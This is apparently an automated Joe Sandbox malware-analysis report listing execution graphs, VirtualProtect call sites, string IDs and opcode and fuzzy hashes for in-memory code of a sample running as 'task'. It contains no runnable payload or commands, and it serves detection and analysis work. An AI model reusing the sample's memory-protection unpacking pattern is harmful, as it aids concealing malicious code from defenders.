                                                      Total number of Nodes:42
                                                      Total number of Limit Nodes:6
                                                      execution_graph 958 7ffaac4a06f5 959 7ffaac4a070d VirtualProtect 958->959 961 7ffaac4abe29 959->961 1009 7ffaac4a2065 1011 7ffaac4a207b 1009->1011 1010 7ffaac4a0570 VirtualProtect 1010->1011 1011->1010 1012 7ffaac4a2111 1011->1012 962 7ffaac4a0837 963 7ffaac4a083f 962->963 966 7ffaac4a07ce 963->966 967 7ffaac4a0500 963->967 965 7ffaac4a08d3 968 7ffaac4a0505 967->968 969 7ffaac4a5c59 VirtualProtect 968->969 971 7ffaac4a05ce 968->971 970 7ffaac4a5cf9 969->970 970->965 971->965 971->971 980 7ffaac4a17e6 983 7ffaac4a0510 980->983 982 7ffaac4a17eb 984 7ffaac4a0515 983->984 985 7ffaac4a05ce 984->985 986 7ffaac4a5c59 VirtualProtect 984->986 985->982 987 7ffaac4a5cf9 986->987 987->982 1006 7ffaac4a09f8 1007 7ffaac4a0570 VirtualProtect 1006->1007 1008 7ffaac4a0a17 1007->1008 1013 7ffaac4a045b 1014 7ffaac4a045f 1013->1014 1015 7ffaac4a5c59 VirtualProtect 1014->1015 1017 7ffaac4a05ce 1014->1017 1016 7ffaac4a5cf9 1015->1016 1017->1017 988 7ffaac4a20ff 989 7ffaac4a2111 988->989 991 7ffaac4a2092 988->991 991->988 992 7ffaac4a0570 991->992 994 7ffaac4a0579 992->994 993 7ffaac4a05ce 993->991 994->993 995 7ffaac4a5c59 VirtualProtect 994->995 996 7ffaac4a5cf9 995->996 996->991 997 7ffaac4a5b21 998 7ffaac4a5bbe VirtualProtect 997->998 1000 7ffaac4a5cf9 998->1000

                                                      Executed Functions

                                                      Function 00007FFAAC4A045B Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 370COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1472827189.00007FFAAC4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_7ffaac4a0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ?O_^
                                                      • API String ID: 0-1127923838
                                                      • Opcode ID: ad39946db0466e60089ac7d5b6a2b330766023a67ca66a07084b2b696a2546e1
                                                      • Instruction ID: 34c26bea3800ab36a6274ea5707dafed8c3b4732fbdf4eaae4834c21e7ee08fd
                                                      • Opcode Fuzzy Hash: ad39946db0466e60089ac7d5b6a2b330766023a67ca66a07084b2b696a2546e1
                                                      • Instruction Fuzzy Hash: 89B12071A0C7498FEB14DF68D8546E9BBB0FF56325F0441BAC04AD7292DA30A889CB95
                                                      Function 00007FFAAC4A06F5 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 324memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1472827189.00007FFAAC4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_7ffaac4a0000_task.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID: =O_^
                                                      • API String ID: 544645111-3912435957
                                                      • Opcode ID: 2389566781486c36ab0677b4dcdadb1a4ccf7b687e232de1aa81420d62b06d92
                                                      • Instruction ID: 83ea771232036642677052a8b53c618ab153d81fdc7aedafff46a04797de189c
                                                      • Opcode Fuzzy Hash: 2389566781486c36ab0677b4dcdadb1a4ccf7b687e232de1aa81420d62b06d92
                                                      • Instruction Fuzzy Hash: 8EB17B7091875C8FDB54DF68D849BE9BBF0FF5A314F0042AAD409E7292DB34A984CB85
                                                      Function 00007FFAAC4A04BD Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 273COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1472827189.00007FFAAC4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_7ffaac4a0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ?O_^
                                                      • API String ID: 0-1127923838
                                                      • Opcode ID: 654093a7b1525cef49dc47130e43bd59cdebbcf079023b7ee44aecf412a7590a
                                                      • Instruction ID: df099566390784b34103c320af6ef4b887964078e24a891bfb409cf79ea4791e
                                                      • Opcode Fuzzy Hash: 654093a7b1525cef49dc47130e43bd59cdebbcf079023b7ee44aecf412a7590a
                                                      • Instruction Fuzzy Hash: 8981FF71A08B4D8FEB54EF5CD8956E8BBF0FF56325F04427AC049D7252DA30A886CB91
                                                      Function 00007FFAAC4A5B21 Relevance: 1.7, APIs: 1, Instructions: 247memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 96 7ffaac4a5b21-7ffaac4a5bbc 97 7ffaac4a5bbe-7ffaac4a5bc0 96->97 98 7ffaac4a5bc1-7ffaac4a5bd1 96->98 97->98 99 7ffaac4a5bd3 98->99 100 7ffaac4a5bd4-7ffaac4a5cf7 VirtualProtect 98->100 99->100 104 7ffaac4a5cf9 100->104 105 7ffaac4a5cff-7ffaac4a5d4d 100->105 104->105
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1472827189.00007FFAAC4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_7ffaac4a0000_task.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: b23543d8ef4fb8019672d24342f9c678e630eb96e77e725c2a63e13c66fa3cf9
                                                      • Instruction ID: 6d838c499c2674e018c6fbb2574da1ed6f36f74f8a234e2b121706ead9f39188
                                                      • Opcode Fuzzy Hash: b23543d8ef4fb8019672d24342f9c678e630eb96e77e725c2a63e13c66fa3cf9
                                                      • Instruction Fuzzy Hash: 26817B7080D7888FDB06DF688865AE9BFB0EF17305F1541EBC089DB293D664A946CB52
                                                      Function 00007FFAAC4A0500 Relevance: 1.7, APIs: 1, Instructions: 241COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 107 7ffaac4a0500-7ffaac4a0541 112 7ffaac4a0543-7ffaac4a057f 107->112 113 7ffaac4a0582 107->113 112->113 115 7ffaac4a0584-7ffaac4a5cf7 VirtualProtect 113->115 116 7ffaac4a05ce-7ffaac4a793d 113->116 130 7ffaac4a5cf9 115->130 131 7ffaac4a5cff-7ffaac4a5d4d 115->131 122 7ffaac4a7944-7ffaac4a794e 116->122 123 7ffaac4a793f 116->123 125 7ffaac4a7a22-7ffaac4a7a2a 122->125 126 7ffaac4a7954-7ffaac4a797a 122->126 123->122 127 7ffaac4a7997-7ffaac4a7998 126->127 128 7ffaac4a797c-7ffaac4a7993 126->128 127->125 133 7ffaac4a7995 128->133 130->131 133->133
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1472827189.00007FFAAC4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_7ffaac4a0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5e74a27a0499540d08ad0051cd6c414bbadb2514d3e5baf77a82797ee9ab9e01
                                                      • Instruction ID: 2611fcb1eac01ecde1b1862dd49139828acf51a0ff782fe84ecd59480aa77b83
                                                      • Opcode Fuzzy Hash: 5e74a27a0499540d08ad0051cd6c414bbadb2514d3e5baf77a82797ee9ab9e01
                                                      • Instruction Fuzzy Hash: C271BD71A0CB4D8FEB54DF58D8996E9BBF0FB56315F0042BAC04AD7252DB30A885CB85
                                                      Function 00007FFAAC4A0510 Relevance: 1.7, APIs: 1, Instructions: 232COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 134 7ffaac4a0510-7ffaac4a0541 138 7ffaac4a0543-7ffaac4a057f 134->138 139 7ffaac4a0582 134->139 138->139 141 7ffaac4a0584-7ffaac4a5cf7 VirtualProtect 139->141 142 7ffaac4a05ce-7ffaac4a793d 139->142 156 7ffaac4a5cf9 141->156 157 7ffaac4a5cff-7ffaac4a5d4d 141->157 148 7ffaac4a7944-7ffaac4a794e 142->148 149 7ffaac4a793f 142->149 151 7ffaac4a7a22-7ffaac4a7a2a 148->151 152 7ffaac4a7954-7ffaac4a797a 148->152 149->148 153 7ffaac4a7997-7ffaac4a7998 152->153 154 7ffaac4a797c-7ffaac4a7993 152->154 153->151 159 7ffaac4a7995 154->159 156->157 159->159
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1472827189.00007FFAAC4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_7ffaac4a0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e35118cc9f153c4832169a68ba3e7ab2005e6c3437a4e181af8b53d77668459e
                                                      • Instruction ID: 554b0d13f1213707ecad01c66c0c8545f8fcdbd0c4c319c53492d34962ed68eb
                                                      • Opcode Fuzzy Hash: e35118cc9f153c4832169a68ba3e7ab2005e6c3437a4e181af8b53d77668459e
                                                      • Instruction Fuzzy Hash: 4361CD7190CB4DCFEB54DF58D899AE9BBF0FB56315F0042AAC04AD7252DB30A885CB85
                                                      Function 00007FFAAC4A0550 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 160 7ffaac4a0550-7ffaac4a0582 165 7ffaac4a0584-7ffaac4a5cf7 VirtualProtect 160->165 166 7ffaac4a05ce-7ffaac4a793d 160->166 178 7ffaac4a5cf9 165->178 179 7ffaac4a5cff-7ffaac4a5d4d 165->179 170 7ffaac4a7944-7ffaac4a794e 166->170 171 7ffaac4a793f 166->171 173 7ffaac4a7a22-7ffaac4a7a2a 170->173 174 7ffaac4a7954-7ffaac4a797a 170->174 171->170 175 7ffaac4a7997-7ffaac4a7998 174->175 176 7ffaac4a797c-7ffaac4a7993 174->176 175->173 181 7ffaac4a7995 176->181 178->179 181->181
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1472827189.00007FFAAC4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_7ffaac4a0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bd306b4ed286522e52ff77fec2584788df86789d0a73d3858a8cb854c94eb038
                                                      • Instruction ID: a78d922926582e388c9020cb8f7bd0e335adbc4fb326c6865fd7956e73e21806
                                                      • Opcode Fuzzy Hash: bd306b4ed286522e52ff77fec2584788df86789d0a73d3858a8cb854c94eb038
                                                      • Instruction Fuzzy Hash: 0D516C70908B4C8FEB54DF58D889AEDBBF0FB59315F1042AED04AE7251DB30A985CB85
                                                      Function 00007FFAAC4A0570 Relevance: 1.7, APIs: 1, Instructions: 182COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 182 7ffaac4a0570-7ffaac4a0582 185 7ffaac4a0584-7ffaac4a5cf7 VirtualProtect 182->185 186 7ffaac4a05ce-7ffaac4a793d 182->186 198 7ffaac4a5cf9 185->198 199 7ffaac4a5cff-7ffaac4a5d4d 185->199 190 7ffaac4a7944-7ffaac4a794e 186->190 191 7ffaac4a793f 186->191 193 7ffaac4a7a22-7ffaac4a7a2a 190->193 194 7ffaac4a7954-7ffaac4a797a 190->194 191->190 195 7ffaac4a7997-7ffaac4a7998 194->195 196 7ffaac4a797c-7ffaac4a7993 194->196 195->193 201 7ffaac4a7995 196->201 198->199 201->201
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1472827189.00007FFAAC4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_7ffaac4a0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1ffcbbb45f692e40219e138146dacbfaa35b9b279272693922fdc23c4a5b9b15
                                                      • Instruction ID: 3b9f59abecf88661e5ebcf3145cb6fcb493f7d82d4807926346e1b97d9801881
                                                      • Opcode Fuzzy Hash: 1ffcbbb45f692e40219e138146dacbfaa35b9b279272693922fdc23c4a5b9b15
                                                      • Instruction Fuzzy Hash: 49514974908A0C8FDB58DF58D889BEDBBF1FB69315F10426ED04AE3251DB30A985CB85

                                                      Execution Graph

                                                      Execution Coverage:17.9%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:3
                                                      Total number of Limit Nodes:0
                                                      execution_graph 767 7ffaac4d06f5 768 7ffaac4d06ff VirtualProtect 767->768 770 7ffaac4dbe29 768->770

                                                      Executed Functions

                                                      Function 00007FFAAC4D06F5 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 229COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.1523959912.00007FFAAC4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_7ffaac4d0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: =L_^
                                                      • API String ID: 0-3950360236
                                                      • Opcode ID: 23db8d1d6e925cd72f4eea40f905e4c5d1d3e4eaedde78dd75652a6a282e2ba7
                                                      • Instruction ID: 6e236d53424bb07c4eb33d031cff96e59c6c62577f55c355879f340fbab7d4d6
                                                      • Opcode Fuzzy Hash: 23db8d1d6e925cd72f4eea40f905e4c5d1d3e4eaedde78dd75652a6a282e2ba7
                                                      • Instruction Fuzzy Hash: 87616D7091874C8FEB54EF98D849BE9BBF0FB59314F0042AED409D7252DB34A945CB85
                                                      Function 00007FFAAC4D5B21 Relevance: 1.8, APIs: 1, Instructions: 311memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.1523959912.00007FFAAC4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_7ffaac4d0000_task.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: bf8a549b58cc8a7833ae549e995e6506930b17b7ff0e1ebb1d247eb9a432c3c0
                                                      • Instruction ID: 90cdd8c9776dc391ef0dc9c5e4e92580c5fbb632d935fce6ed11c43962694e3f
                                                      • Opcode Fuzzy Hash: bf8a549b58cc8a7833ae549e995e6506930b17b7ff0e1ebb1d247eb9a432c3c0
                                                      • Instruction Fuzzy Hash: 29B1BC7090D7888FDB16DF68C855AE9BFB0EF17314F0541EBC089D7292DA34A949CB92

                                                      Execution Graph

                                                      Execution Coverage:18.3%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:51
                                                      Total number of Limit Nodes:7
                                                      execution_graph 905 7ffaac4c2065 907 7ffaac4c207b 905->907 906 7ffaac4c0570 VirtualProtect 906->907 907->906 908 7ffaac4c2111 907->908 858 7ffaac4c07f2 860 7ffaac4c0815 858->860 859 7ffaac4c07ce 860->859 863 7ffaac4c0500 860->863 862 7ffaac4c08d3 864 7ffaac4c0505 863->864 865 7ffaac4c5c59 VirtualProtect 864->865 867 7ffaac4c05ce 864->867 866 7ffaac4c5cf9 865->866 866->862 867->862 867->867 902 7ffaac4c09f8 903 7ffaac4c0570 VirtualProtect 902->903 904 7ffaac4c0a17 903->904 868 7ffaac4c3ca7 871 7ffaac4c0550 868->871 870 7ffaac4c3cac 872 7ffaac4c0555 871->872 873 7ffaac4c05ce 872->873 874 7ffaac4c5c59 VirtualProtect 872->874 873->870 875 7ffaac4c5cf9 874->875 875->870 876 7ffaac4c17e6 879 7ffaac4c0510 876->879 878 7ffaac4c17eb 880 7ffaac4c0515 879->880 881 7ffaac4c5c59 VirtualProtect 880->881 883 7ffaac4c05ce 880->883 882 7ffaac4c5cf9 881->882 882->878 883->878 883->883 897 7ffaac4c04bd 898 7ffaac4c04c5 897->898 899 7ffaac4c05ce 898->899 900 7ffaac4c5c59 VirtualProtect 898->900 901 7ffaac4c5cf9 900->901 909 7ffaac4c045b 910 7ffaac4c045f 909->910 911 7ffaac4c5c59 VirtualProtect 910->911 913 7ffaac4c05ce 910->913 912 7ffaac4c5cf9 911->912 913->913 893 7ffaac4c5b21 894 7ffaac4c5bbe VirtualProtect 893->894 896 7ffaac4c5cf9 894->896 884 7ffaac4c20ff 885 7ffaac4c2092 884->885 886 7ffaac4c2111 884->886 885->884 888 7ffaac4c0570 885->888 889 7ffaac4c0579 888->889 890 7ffaac4c05ce 889->890 891 7ffaac4c5c59 VirtualProtect 889->891 890->885 892 7ffaac4c5cf9 891->892 892->885

                                                      Executed Functions

                                                      Function 00007FFAAC4C045B Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 371COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.1556825526.00007FFAAC4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_7ffaac4c0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ?M_^
                                                      • API String ID: 0-1086198800
                                                      • Opcode ID: f0653491a8f4bd74f59529de6079d5b4cd59df6ef2dcfb6bed7a4e19f83e97fa
                                                      • Instruction ID: ab13e0f4f7f755bee4a71025eae64e3399ee689bf00f042a5a09206b7a0e876e
                                                      • Opcode Fuzzy Hash: f0653491a8f4bd74f59529de6079d5b4cd59df6ef2dcfb6bed7a4e19f83e97fa
                                                      • Instruction Fuzzy Hash: A3B13F31A0D74D8FEB15DB68D8946FDBBB0FF56324F0482BAC049D7292DA30A845CB84
                                                      Function 00007FFAAC4C04BD Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 273COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.1556825526.00007FFAAC4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_7ffaac4c0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ?M_^
                                                      • API String ID: 0-1086198800
                                                      • Opcode ID: c6930ff2e4482ef1f3d14cd3256057bf3ab0c7987577b193bf2b380213dcbb33
                                                      • Instruction ID: 1e78e5d060ee776b510fb3a9ec1c1749841d9ce08cb1adfacd71f96f61cf7087
                                                      • Opcode Fuzzy Hash: c6930ff2e4482ef1f3d14cd3256057bf3ab0c7987577b193bf2b380213dcbb33
                                                      • Instruction Fuzzy Hash: A5811031A0CB5D8FEB54EB5CD8956F8BBF0FF56325F0042BAC04997252DB20A845CB81
                                                      Function 00007FFAAC4C5B21 Relevance: 1.7, APIs: 1, Instructions: 246memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.1556825526.00007FFAAC4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_7ffaac4c0000_task.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 93f23f74df5ba64e6c8f78317a99e825babce2c3ff755c5213cfb1c9c0a2ea62
                                                      • Instruction ID: 7b2cf8a08d44e0215ebfb29ff594bf72b42d1ae891a79abc9abf3eeab26c53dd
                                                      • Opcode Fuzzy Hash: 93f23f74df5ba64e6c8f78317a99e825babce2c3ff755c5213cfb1c9c0a2ea62
                                                      • Instruction Fuzzy Hash: 0A818C7080D7888FDB06DF688865AE9BFB0EF27305F1541EFC089D72A3D664A945CB52
                                                      Function 00007FFAAC4C0500 Relevance: 1.7, APIs: 1, Instructions: 241COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.1556825526.00007FFAAC4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_7ffaac4c0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3eb6a440e516e1de3b7394a832ca3c872ba2d826800fcf4a8275f5469f3ccee
                                                      • Instruction ID: c9909307941c8f0c71d87c65f50c5f45412e588db00005792163c79ff290efea
                                                      • Opcode Fuzzy Hash: a3eb6a440e516e1de3b7394a832ca3c872ba2d826800fcf4a8275f5469f3ccee
                                                      • Instruction Fuzzy Hash: 5E71ED7190DB5D8FEB54DF58D899AF8BBF0FB56315F0042AAC04997252DB30A885CB81
                                                      Function 00007FFAAC4C0510 Relevance: 1.7, APIs: 1, Instructions: 232COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 109 7ffaac4c0510-7ffaac4c0541 113 7ffaac4c0543-7ffaac4c057f 109->113 114 7ffaac4c0582 109->114 113->114 116 7ffaac4c0584-7ffaac4c5cf7 VirtualProtect 114->116 117 7ffaac4c05ce-7ffaac4c793d 114->117 131 7ffaac4c5cf9 116->131 132 7ffaac4c5cff-7ffaac4c5d4d 116->132 123 7ffaac4c7944-7ffaac4c794e 117->123 124 7ffaac4c793f 117->124 126 7ffaac4c7954-7ffaac4c797a 123->126 127 7ffaac4c7a22-7ffaac4c7a2a 123->127 124->123 128 7ffaac4c7997-7ffaac4c7998 126->128 129 7ffaac4c797c-7ffaac4c7993 126->129 128->127 134 7ffaac4c7995 129->134 131->132 134->134
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.1556825526.00007FFAAC4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_7ffaac4c0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cf7556ce160953a2387ca0ba01fc870034867e9379c9e1bc97b8255d97715fa6
                                                      • Instruction ID: 930668b0eb3b8e8412a152f1c880a86f3b47bf54484f6ea9008134943c145988
                                                      • Opcode Fuzzy Hash: cf7556ce160953a2387ca0ba01fc870034867e9379c9e1bc97b8255d97715fa6
                                                      • Instruction Fuzzy Hash: 3961DC7090CB4D8FEB54DF58D899AFDBBF0FB56315F0042AAC049A7252DB30A885CB81
                                                      Function 00007FFAAC4C0550 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 135 7ffaac4c0550-7ffaac4c0582 140 7ffaac4c0584-7ffaac4c5cf7 VirtualProtect 135->140 141 7ffaac4c05ce-7ffaac4c793d 135->141 153 7ffaac4c5cf9 140->153 154 7ffaac4c5cff-7ffaac4c5d4d 140->154 145 7ffaac4c7944-7ffaac4c794e 141->145 146 7ffaac4c793f 141->146 148 7ffaac4c7954-7ffaac4c797a 145->148 149 7ffaac4c7a22-7ffaac4c7a2a 145->149 146->145 150 7ffaac4c7997-7ffaac4c7998 148->150 151 7ffaac4c797c-7ffaac4c7993 148->151 150->149 156 7ffaac4c7995 151->156 153->154 156->156
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.1556825526.00007FFAAC4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_7ffaac4c0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b6aa282c442b266fada54270abccd6a4b3483b47ba7dcc8b0f65e76a61a52b6f
                                                      • Instruction ID: e33c78136aa352161a9298110afe80ef2b5828dcddd23845f29f0e662617f4cb
                                                      • Opcode Fuzzy Hash: b6aa282c442b266fada54270abccd6a4b3483b47ba7dcc8b0f65e76a61a52b6f
                                                      • Instruction Fuzzy Hash: 51518C7090C74C8FEB54DF58D889AEDBBF0FB6A315F10426ED04AA3251DB30A985CB85
                                                      Function 00007FFAAC4C0570 Relevance: 1.7, APIs: 1, Instructions: 182COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 157 7ffaac4c0570-7ffaac4c0582 160 7ffaac4c0584-7ffaac4c5cf7 VirtualProtect 157->160 161 7ffaac4c05ce-7ffaac4c793d 157->161 173 7ffaac4c5cf9 160->173 174 7ffaac4c5cff-7ffaac4c5d4d 160->174 165 7ffaac4c7944-7ffaac4c794e 161->165 166 7ffaac4c793f 161->166 168 7ffaac4c7954-7ffaac4c797a 165->168 169 7ffaac4c7a22-7ffaac4c7a2a 165->169 166->165 170 7ffaac4c7997-7ffaac4c7998 168->170 171 7ffaac4c797c-7ffaac4c7993 168->171 170->169 176 7ffaac4c7995 171->176 173->174 176->176
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.1556825526.00007FFAAC4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_7ffaac4c0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9843c5e50ef5ad09268ba2addc4394c214ffde8b878f2d726c901e536fc43b64
                                                      • Instruction ID: cc3630a9c1ed1db18090225515cdfd97f1bfed34adba9b9ad05942665debf373
                                                      • Opcode Fuzzy Hash: 9843c5e50ef5ad09268ba2addc4394c214ffde8b878f2d726c901e536fc43b64
                                                      • Instruction Fuzzy Hash: 5A515974908A0C8FDB58DF58D889BEDBBF1FB69315F10426ED04AE3251DB30A985CB85

                                                      Execution Graph

                                                      Execution Coverage:8.7%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:3
                                                      Total number of Limit Nodes:0
                                                      execution_graph 2972 7ffaac4cbcf5 2973 7ffaac4cbd0f VirtualProtect 2972->2973 2975 7ffaac4cbe29 2973->2975

                                                      Executed Functions

                                                      Function 00007FFAAC4CBCF5 Relevance: 1.7, APIs: 1, Instructions: 182memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 16 7ffaac4cbcf5-7ffaac4cbe27 VirtualProtect 20 7ffaac4cbe29 16->20 21 7ffaac4cbe2f-7ffaac4cbe7d 16->21 20->21
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4cb000_task.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 700adbc10616650fef20f1847ed3608f3afb28380fbcd873c40e8562c54b70a1
                                                      • Instruction ID: 547211de2b04c5d048accff35af4c518f4b5fd5b0485b2612e08cd28a94beff8
                                                      • Opcode Fuzzy Hash: 700adbc10616650fef20f1847ed3608f3afb28380fbcd873c40e8562c54b70a1
                                                      • Instruction Fuzzy Hash: E751397090871C8FDB58DF98D885AEDBBF1FB69315F10426ED04AE3251DB70A985CB81
                                                      Function 00007FFAAC4C6AD0 Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4c6000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: r6
                                                      • API String ID: 0-2984296541
                                                      • Opcode ID: 8799f0ccab458901e9d1de1cf9d123b24a60b6d6a3a4a10174f076fc20c3c978
